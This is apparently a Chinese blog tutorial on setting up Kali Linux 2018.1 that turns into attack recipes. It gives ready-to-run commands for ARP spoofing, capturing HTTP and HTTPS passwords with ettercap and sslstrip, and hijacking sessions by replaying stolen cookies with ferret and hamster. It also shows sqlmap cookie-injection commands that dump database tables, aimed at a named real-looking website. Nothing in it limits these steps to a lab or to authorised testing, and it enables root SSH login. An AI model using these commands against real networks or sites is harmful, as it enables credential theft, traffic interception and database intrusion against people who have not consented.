本文讲述了在完成kali安装后其配置的基础过程。操作系统为kali 2018.1。
更新源
更新源的配置文件目录:/etc/apt/sources.list
,更新源可以从网络上获取,以下为我使用的更新源:1
2
3
4
5
6
7
8
9
10
11
12
13#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#阿里云源
deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
配置文件修改完成后,使用apt-get update
命令更新源,使用apt-get dist-upgrade
命令安装源。
安装vmware tools工具
在虚拟机菜单中,找到vmware tools工具,载入镜像进行安装。安装时的参数为默认值,安装完成后重启即可。
kali美化
执行apt-get install kde-full
,安装美化界面。安装完成后,在登录时选择该界面即可。
开启ssh
LINUX可以仅进入终端命令界面,从而达到节约资源的目的。1
2ctrl + alt + f2 进入命令行界面
ctrl + alt + f1 进入GUI界面
开启ssh需要开启ssh服务,使用以下命令及配置开启后,可直接远程连接。1
2
3/etc/init.d/ssh start #开启ssh
ps -ef |grep ssh #检查是否启动成功
nano /etc/ssh/sshd_config 将PermitRootLogin改为yes
ARP欺骗
ARP欺骗原理1
2
3fping -asg 192.168.1.0/24 #查询在线IP
echo 1 > /proc/sys/net/ipv4/ip_forward #打开IP转发
arpspoof -i <网卡名> -t <欺骗目标IP> <我是谁> #仅执行该命令则为arp断网攻击
图片捕获
1 | (1)开启ARP欺骗 |
ettercap实现获取http密码
1 | (1)开启ARP欺骗 |
ettercap实现获取https密码
执行nano /etc/ettercap/etter.conf
命令,修改配置文件1
2
3
4在Linux下,将两个注释放开:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport ...
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport...
使用sslstrip工具将https的链接还原为http, sslstrip的原理1
sslstrip -afk
再执行http密码获取的方法1
2(1)开启ARP欺骗
(2)ettercap -Tq -i eth0 #T表示文本模式,q表示静默模式
会话劫持
方法1
- (1)开启ARP欺骗
- (2) 打开wireshark软件,对ARP欺骗的网卡进行抓包,完成后保存格式为
Wireshark/tcpdump/...- pcap
(3) 使用ferret,生成抓包后的流量信息文件
1
ferret -r c.pcap
(4) 使用hamster重放流量
1
2cp hamster.txt /root/ #将第3步的流量信息文件放到/root目录下
hamster #启动软件打开浏览器,在浏览器中设置代理为
127.0.0.1:1234
,网站访问127.0.0.1:1234
,左侧为cookie,点击重放即可。
方法2
- (1)打开arp欺骗
- (2)进入
/usr/bin
目录下,执行ferret -i eth0
- (3)进入
/usr/bin
目录下,执行hamster
- (4)浏览器配置
127.0.0.1:1234
代理,并访问127.0.0.1:1234
- (5)流量经过eth0时,浏览器中adapters中选择eth0,并提交,cookie会实时更新。
sqlmap工具
asp网站的渗透
1 | sqlmap -u "注入点" #检测是否存在注入,如果存在,则返回数据库的名字等信息 |
php网站的渗透
1 | sqlmap -u "注入点" #检测是否存在注入,如果存在,则返回数据库的名字等信息 |
cookie注入
以http://www.wisefund.com.cn/about.asp?id=56
为例1
2
3
4sqlmap -u "http://www.wisefund.com.cn/about.asp" --cookie "ie=56" --level 2 #cookie里写ID的参数,如果是cookie注入,需要提升等级为level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --tables --cookie "ie=56" --level 2 #猜表名
sqlmap -u "http://www.wisefund.com.cn/about.asp" --columns -T "表名" --cookie "ie=56" --level 2 #猜列名
sqlmap -u "http://www.wisefund.com.cn/about.asp" --dump -C "列名1,..." -T "表名" --cookie "ie=56" --level 2 #猜值